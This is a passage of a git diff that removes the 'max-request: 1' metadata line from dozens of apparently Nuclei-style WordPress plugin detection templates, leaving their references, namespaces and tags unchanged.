@@ info: reference: - https://wordpress.org/plugins/pinterest-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: pinterest-for-woocommerce wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index fc316f9f7a..a81fc892ca 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..9555d7aebd 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..180266f448 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 1bb9a283ce..17584cd064 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 87721a245a..d4ac0d179e 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 45e0dead0e..dbbadf3cfc 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index aa1898c4ba..48ffb25245 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 